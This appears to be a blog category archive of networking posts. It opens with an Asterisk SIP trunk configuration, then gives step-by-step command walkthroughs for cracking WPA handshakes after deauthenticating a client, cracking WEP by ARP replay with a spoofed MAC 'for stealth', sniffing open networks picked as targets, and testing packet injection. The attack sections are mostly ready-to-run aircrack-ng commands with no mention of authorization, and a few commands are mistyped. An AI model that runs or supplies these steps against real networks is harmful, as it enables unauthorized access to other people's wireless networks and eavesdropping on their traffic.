Category Archives: Networking

SIP Trunking between Asterisk 1.4 and Cisco CUBE

As far as I can tell Cisco CUBE only supports unauthenticated SIP trunks, which isn’t too much trouble for Asterisk.

In sip.conf:
type=peer
host=x.x.x.x
context=trunks-inbound
allow=all
insecure=invite,port
trustrpid=yes
sendrpid=no
qualify=yes
(change ‘trunks-inbound’ to the necessary context)

In extensions.conf:
exten=>_0.,1,Set(CALLERID(num)=nnn-nnn-${CALLERID(num)})
exten=>_0.,n,Dial(SIP/x.x.x.x/${EXTEN:1})
exten=>_0.,n,Hangup
(First line is optional, and simply adds a prefix to the outgoing caller ID)

The “insecure=invite,port” is the critical part, as the source port from the Cisco CUBE appears to be dynamic unlike a tradition SIP trunk.

Brute Forcing WPA WiFi Encryption

WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Enter monitor mode: airmon-ng start wlan0
  3. Find nearby networks: airodump-ng mon0
  4. Identify the target BSSID and Channel number (-c option below)
  5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
  6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
  7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
  8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
  9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
  10. Stop monitor mode: airmon-ng stop mon0

Breaking WEP Encryption

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as ‘-c‘ option below)
  5. Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshare output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

Very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000